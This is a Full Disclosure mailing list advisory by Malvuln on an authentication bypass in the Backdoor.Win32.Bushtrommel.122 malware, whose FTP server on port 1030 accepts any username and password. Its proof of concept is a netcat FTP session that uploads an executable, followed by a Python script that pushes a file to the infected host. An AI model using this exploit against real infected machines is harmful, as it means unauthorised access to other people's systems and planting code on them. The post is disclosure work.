Full Disclosure mailing list archives

Backdoor.Win32.Bushtrommel.122 / Authentication Bypass


From: malvuln <malvuln13 () gmail com>
Date: Thu, 4 Aug 2022 21:05:39 -0400

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source:
https://malvuln.com/advisory/76c09bc82984c7f7ef55eb13018e0d87.txt
Contact: malvuln13 () gmail com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Bushtrommel.122
Vulnerability: Authentication Bypass
Description: The malware listens on TCP port 31745 runs an ftp server on
port 1030. Attackers who can reach infected systems can logon using any
username/password combination. Intruders may then upload executables using
ftp PASV, STOR commands.
Family: Bushtrommel
Type: PE32
MD5: 76c09bc82984c7f7ef55eb13018e0d87
Vuln ID: MVID-2022-0629
Disclosure: 08/04/2022

Exploit/PoC:
C:\>nc64.exe 192.168.18.125 1030
220 ICS FTP Server ready.
USER malvuln
331 Password required for malvuln.
PASS malvuln
230 User malvuln logged in.
SYST
215 UNIX Type: L8 Internet Component Suite
PASV
227 Entering Passive Mode (192,168,18,125,236,165).
STOR DOOM.exe
150 Opening data connection for DOOM.exe.
426 Connection closed; Datei C:\TEMP\DOOM.exe kann nicht erstellt werden.
CDUP \
250 CWD command successful. "C:/" is current directory.
PASV
227 Entering Passive Mode (192,168,18,125,236,172).
STOR DOOM.exe
150 Opening data connection for DOOM.exe.
226 File received ok


from socket import *

MALWARE_HOST="192.168.18.125"
PORT=60588
DOOM="DOOM.exe"

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    f = open(DOOM, "rb")
    EXE = f.read()
    s.send(EXE)

    while EXE:
        s.send(EXE)
        EXE=f.read()

    s.close()

    print("By Malvuln");

if __name__=="__main__":
    doit()


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Current thread: